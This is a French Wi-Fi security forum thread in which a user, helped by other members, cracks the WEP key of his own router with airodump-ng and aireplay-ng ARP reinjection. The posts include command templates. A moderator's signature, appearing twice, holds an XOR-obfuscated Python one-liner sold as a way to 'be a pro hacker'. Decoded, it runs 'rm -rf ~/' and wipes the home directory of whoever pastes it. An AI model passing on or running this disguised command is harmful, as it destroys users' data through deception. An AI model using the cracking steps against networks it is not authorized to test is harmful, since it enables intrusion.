Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-05-2012 19:39:35

badjulien
Nouveau membre
Inscription : 21-05-2012
Messages : 5

[Résolu] Frame vs packet

Bonjour à tous,

C'est mon premier post wink et pas le dernier tongue.

J'ai fait de multiple recherche sur le net mais je n'ai pas trouvé de réponses...

J'aimerai "jouer" avec ma sécurité internet.

J'ai une carte PCI D-Link AriPlus XtremG 2.4GHz DWL-G650. Le Chipset Atheros AR2414 / Driver ath5k.

Je fais toute la marche à suivre pour passer en "monitor mode enabled on mon0".

J'utilise airodump et scanne toutes les channels. C'est ok je trouve bien mon réseau (pas difficile, il n'y en a qu'un).

MAIS quand je regarde dans la partie suivante du "tableau" où il y a "PWR ; Rate ; Lost" , je vois qu'il est indiqué FRAMES et non pas PACKET comme sur ce que j'ai pu trouver sur internet.

J'ai activé l'envoi via aireplay des ARP et je suis arrivé à +/- 600.000 ou 600.000.000 après 15 20 min de scan. c'est une clé wep basique du style 0a0b0c0d0.

Le taux dans le tableau airodump de la colonne #/s était entre 150 et 180

En utilisant aircrack, j'avais 8 Ivs et m'a dit que ce n'était pas possible.

Je me pose alors la question : Est-ce que ma carte est capable de réceptionner les packets et pourquoi ai-je "FRAMES" et pas "PACKET" neutral

Je pensais acheter une AWUS036H mais est-ce que je dois le faire ou je dois lancer une commande pour lancer une option X pour la réception des packets ?

Merci pour vos idées :-)

Dernière modification par badjulien (16-06-2012 18:15:14)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-05-2012 21:26:28

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Résolu] Frame vs packet

airodump-ng ou airodump-zc ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 25-05-2012 07:38:54

badjulien
Nouveau membre
Inscription : 21-05-2012
Messages : 5

Re : [Résolu] Frame vs packet

Bonjour,

J'utilise airodump-ng. je ne sais pas si cela a un rapport avec ma carte wifi. je suis sous bt5

Merci beaucoup :-)

Hors Ligne

#4 25-05-2012 13:50:33

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Résolu] Frame vs packet

je ne sais pas, je n'ai pas bt sous la main pour vérifier. enfin si, au sens propre, mais je n'ai pas le temps de rebooter pour tester, j'ai du taf. attends les réponses des autres (:


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 25-05-2012 17:01:25

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Résolu] Frame vs packet

Moi je peux wink

badjulien a écrit :

MAIS quand je regarde dans la partie suivante du "tableau" où il y a "PWR ; Rate ; Lost" , je vois qu'il est indiqué FRAMES et non pas PACKET comme sur ce que j'ai pu trouver sur internet.

Si tu te réfère à la partie d'en bas (où aparraissent les stations) c'est l'affichage normal; il diffère un peu de celui que tu as pour la partie "routeur" (haute) du tableau
ex :

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
 00:1                -80       19            0        0    11  54 . WPA  TKIP   MGT  eduro                                                                                              
 00:19:15:        -81        2             0        0    11  54   WPA  TKIP   PSK  WLAN                                                                                           
 00:1A:            -82        1              0       0     11  54 . WEP  WEP         links                                                                                            
 30:AA:26       -116       97           22       7     11  54e  WPA  CCMP   PSK  WLAN                                                                                          
                                                                                                                                                                                
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                      
                                                                                                                                                                                 
 (not associated)   :CE:A6:83       -77    0 - 1      0        1                                                                                                              
 (not associated)   :DC:47:95       -76    0 - 1      0        2  FT                                                                                                   
 (not associated)    D6:DC:2E       -78    0 - 1      1        3                                                                                                              
 (not associated)   00:12:17:       -78    0 - 2     49        4  WLAN                                                                                                A6:79:BC:           A:6B:C:BC       -73    0 - 1      0       42                                                                                                              
 A6:79:BC            :C9:29:B3       -78    0 - 1     34       24                                                  
badjulien a écrit :

J'ai activé l'envoi via aireplay des ARP et je suis arrivé à +/- 600.000 ou 600.000.000 après 15 20 min de scan. c'est une clé wep basique du style 0a0b0c0d0.

600 000 je pense wink
( 500 datas/segondes c'est déjà bien - à ce sujet : pas la peine d'acheter une alfa, un bon chipset atheros PCI comme le tiens permet de faire absolument tout. C'est un exellent matériel)

En utilisant aircrack, j'avais 8 Ivs et m'a dit que ce n'était pas possible.

Es tu en mode live?
Quelle route as tu mis après "-w" dans ta commande airodump-ng?
Est -ce que tu utilisais pour ton injection un client légitime connecté ou une fausse association?

Hors Ligne

#6 29-05-2012 20:40:57

badjulien
Nouveau membre
Inscription : 21-05-2012
Messages : 5

Re : [Résolu] Frame vs packet

Bonjour :-),

Merci beaucoup pour vos réponses.

Vraiment merci kcdtv :-). Tu as tout juste avec ton tableau avec "Frames".

J'ai encore cherché sur internet et j'ai trouver le wiki de backtrack qui dit :
Driver : Madwifi-ng
chipset : atheros AR5212A/B/G
Pour kismet, editer votre fichier kismet.conf (/usr/local/etc/kismet.conf) en "source=madwifi_g,wifi0Atheros"
Notice : pour activer le mode promiscuous;
airmon-ng start wifi0
ifconfig ath1 up
iwconfig ath1 monde monitor

J'ai installer BT5 et il n'y a que lui sur mon portable j'avais en effet utilisé la commande -w en mettant test_20052012 quelque chose comme ça vu que je faisais quelques testes...

J'ai utilisé l'option -3 pour cracker. C'est une clé WEP 64bit.

Je ne sais par contre pas comment installer le driver madwifi-ng. Sur le site, ils donnent un format que BT ne semble pas reconnaitre... Y-a-t-il une ligne de commande pour celà ? y a-t-il une commande à effectuer ?

Je n'ai mis aucune limitation MAC ADRESS. Je te dis ça parce que je ne sais pas exactement niveau client légitime ou fausse association. J'ai peut-être mal choisi mon association ou mauvaise commande pas -3 mais une autre ?

Merci beaucoup pour vos réactions :-)

Hors Ligne

#7 30-05-2012 12:17:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Résolu] Frame vs packet

Madwifi est un projet abandonné wink
  Ce sont de très bons drivers, très novateurs pour leur époque, qui ont fait des atheros les meilleurs chipsets sur le marché pendant pas mal d'années.
Mais depuis quelques années maintenant on utilise compat-wireless pour à peu près tout.
C'est maintenant la base des distributions GNU/Linux pour ce qui est des drivers wireless.
Bref; après de bons loyaux services, madwifi est mort, reste avec les drivers compat-wireless qui sont installés par défaut dans Backtrack 5r2.
LinuxWireless

badjulien a écrit :

J'ai peut-être mal choisi mon association ou mauvaise commande pas -3 mais une autre ?

Tu as deux cas de figures.
  - 1. Avec client
  - 2. Sans client

1. avec client >
Tu as dans la partie basse de ton tableau airodump-ng une <station> (un client) â côté de l'adresse mac de ton routeur (bssid). 
Tu peux lancer directement ton attaque re-injection d'ARP en utilisant la mac du client connecté après "-h" dans ta ligne de commande

aireplay-ng 3 -b <mac_routeur> -h <mac_client> <interface>

Tu auras besoin: - d'ARP  ( désauthetifie un peu le client si rien ne rentre après 5-6 minutes wink )
                        -  d'un peu de patience tongue

2. sans client >
Tu dois impérativement réaliser avec succès une fausse association (aireplay-ng -1). Celle ci se réalise dans une console à part et doit tourner en permanence tout au long de l'attaque.

  Rejette un coup d'oeil dans notre section crack de clé WEP, il y a plusieurs topics où nous évoquons ce sujet. wink

Hors Ligne

#8 30-05-2012 21:36:27

badjulien
Nouveau membre
Inscription : 21-05-2012
Messages : 5

Re : [Résolu] Frame vs packet

merci beaucoup pour toutes tes explications big_smile clé wep craquée en 2 min :-)

Je vais essayer d'augmenter la difficulté maintenant big_smile.

Merci pour tout :-)

Hors Ligne

#9 30-05-2012 23:00:15

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Résolu] Frame vs packet

Ça cartonne pas si mal que ça un p'tit Atheros... pas vrais? wink

Hors Ligne

#10 16-06-2012 11:12:51

badjulien
Nouveau membre
Inscription : 21-05-2012
Messages : 5

Re : [Résolu] Frame vs packet

kcdtv a écrit :

Ça cartonne pas si mal que ça un p'tit Atheros... pas vrais? wink

En effet big_smile et dire que pendant plusieurs années j'avais pensé que j'avais mal investi dans ma carte... roll

En moins de 2 min ma pseudo sécu est cassée...:P

Je vais pouvoir augmenter la difficulter big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 735 06-10-2016 19:49:01 par X-Ecutioner
5 1856 13-07-2016 15:56:51 par jaues007
18 909 30-05-2016 06:37:52 par ✞θ!ก∃℧┌
1 633 19-05-2016 09:59:01 par Sinaï00
20 1230 30-10-2015 13:12:20 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]